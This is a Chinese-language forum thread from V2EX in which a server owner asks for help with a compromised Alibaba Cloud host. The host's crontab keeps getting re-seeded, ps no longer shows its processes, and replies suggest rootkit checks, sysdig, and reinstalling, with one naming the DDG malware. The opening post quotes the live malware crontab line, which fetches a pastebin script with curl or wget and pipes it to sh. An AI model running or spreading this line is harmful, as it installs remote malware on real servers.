阿里云服务器被挂马,被写入 crontab 删不掉。ps 命令找不到 nginx PHP 进程信息

2019-02-21 14:14:13 +08:00
 hobbyliu

*/15 * * * * (curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh

crontab 被写入这段代码。删除后一会又自动加上。

ps 命令看到的进程很奇怪,php nginx 进程找你不到了,但是服务正常。

怀疑 ps 被修改, 已经从其他服务器替换了回来,但是依旧不行。

7157 次点击
所在节点    信息安全
26 条回复
ThirdFlame
2019-02-21 14:27:44 +08:00
可能不止 PS 被替换了啊
watchdogs 还在运行呢。
dapang1221
2019-02-21 14:32:53 +08:00
alias,查一下是不是 ps 被设置别名,把奇怪的进程 grep 掉了
hcymk2
2019-02-21 14:35:09 +08:00
cpdyj0
2019-02-21 15:20:08 +08:00
检查下内核模块,有没有什么奇怪的东西
huixia0010
2019-02-21 15:37:03 +08:00
有 memcache 吗~有的话,关掉试试~
allenhu
2019-02-21 15:48:20 +08:00
@cpdyj0 好像很有道理,但是怎么检查?
rogerchen
2019-02-21 16:06:22 +08:00
重置吧,手工不能打过 rootkit 的
hobbyliu
2019-02-21 16:14:50 +08:00
@huixia0010 并没有,只有 redis 怀疑是 redis 注入 shell 但是,redis 进程号找不到。。ps 命令不好使了
greatbody
2019-02-21 16:34:01 +08:00
用 terraform 来管理基础设置,然后把服务全部都用容器。最后,数据库什么的都用云数据库。

应该会好很多。
ThirdFlame
2019-02-21 17:01:37 +08:00
@hobbyliu ps ls 可能都被替换了。
c0878
2019-02-21 17:13:34 +08:00
保存数据 重装系统
另外阿里云态势感知可以用一下
changliwei
2019-02-21 18:51:45 +08:00
可以实时 csysdiag 程序查看,
sysdig 这个工具的原理不是读取 /proc/的统计值,通过加载一个内核模块,对内核插入各种探测点,动态采集原始数据,再进行分析,恶意软件的隐身原理对 sysdig 不适用了.

top/iotop/lsof/netstat /ps 等工具都是 /proc 下内核统计值工作的工具,很容易被恶意软件的隐藏没法查看。

安装 csysdiag 就可以查看,centos
curl -s https://s3.amazonaws.com/download.draios.com/stable/install-sysdig | sudo bash


Viewing: Processes For: whole machine
Source: Live System Filter: evt.type!=switch
PID CPU USER TH VIRT RES FILE NET Command
4101 100.00 1 317M 5M 0 0.00 <NA>
1012 4.00 root 1 118M 19M 0 0.00 csysdig
30087 0.50 1 4G 3G 0 0.00 <NA>
30084 0.50 1 4G 3G 0 0.00 <NA>
29063 0.50 1 3G 2G 0 0.00 <NA>
9387 0.50 1 4G 3G 0 0.00 <NA>
4058 0.50 1 108M 40M 0 1.69K <NA>




[root@centos ]# ls -l /prox/4101
total 0
dr-xr-xr-x 2 root root 0 Feb 21 18:43 attr
-rw-r--r-- 1 root root 0 Feb 21 18:43 autogroup
-r-------- 1 root root 0 Feb 21 18:43 auxv
-r--r--r-- 1 root root 0 Feb 21 18:43 cgroup
--w------- 1 root root 0 Feb 21 18:43 clear_refs
-r--r--r-- 1 root root 0 Feb 21 18:43 cmdline
-rw-r--r-- 1 root root 0 Feb 21 18:43 comm
-rw-r--r-- 1 root root 0 Feb 21 18:43 coredump_filter
-r--r--r-- 1 root root 0 Feb 21 18:43 cpuset
lrwxrwxrwx 1 root root 0 Feb 21 18:43 cwd -> /
-r-------- 1 root root 0 Feb 21 18:43 environ
lrwxrwxrwx 1 root root 0 Feb 21 18:43 exe -> /tmp/ksoftirqds (deleted)
hobbyliu
2019-02-21 22:00:22 +08:00
@changliwei 试了一下,还是进程缺失,php nginx 进程还是看不到
[![kWlAxJ.md.png]( https://s2.ax1x.com/2019/02/21/kWlAxJ.md.png)]( https://imgchr.com/i/kWlAxJ)
Acoffice
2019-02-21 22:35:15 +08:00
今天上午也有个同事问这个问题,楼主如果解决,麻烦贴出解决方案哦
Acoffice
2019-02-21 22:52:23 +08:00
链接点进去解密可以看到定时任务都执行了什么
Acoffice
2019-02-21 22:53:10 +08:00
太长,我就不往上贴了
Acoffice
2019-02-21 23:16:16 +08:00
简单分析了下,
解决点:卸载 curl 命令,然后删除 cron,kill 掉 nohup /tmp/watchdogs >/dev/null 2>&1 进程,
然后再细看解密后都执行了哪些命令,挨个恢复.
abcbuzhiming
2019-02-21 23:46:55 +08:00
兄弟,我和你症状一模一样啊
https://www.v2ex.com/t/537457
hobbyliu
2019-02-22 00:48:24 +08:00
@Acoffice 我更改了下 host 127.0.0.1 pastebin.com 基本控制住了,但是没有根治啊。找阿里云客服说也没办法让备份恢复系统盘解决。
sdksang
2019-02-22 17:31:16 +08:00
大兄弟 中了 DDG 啊 。。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/537247

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX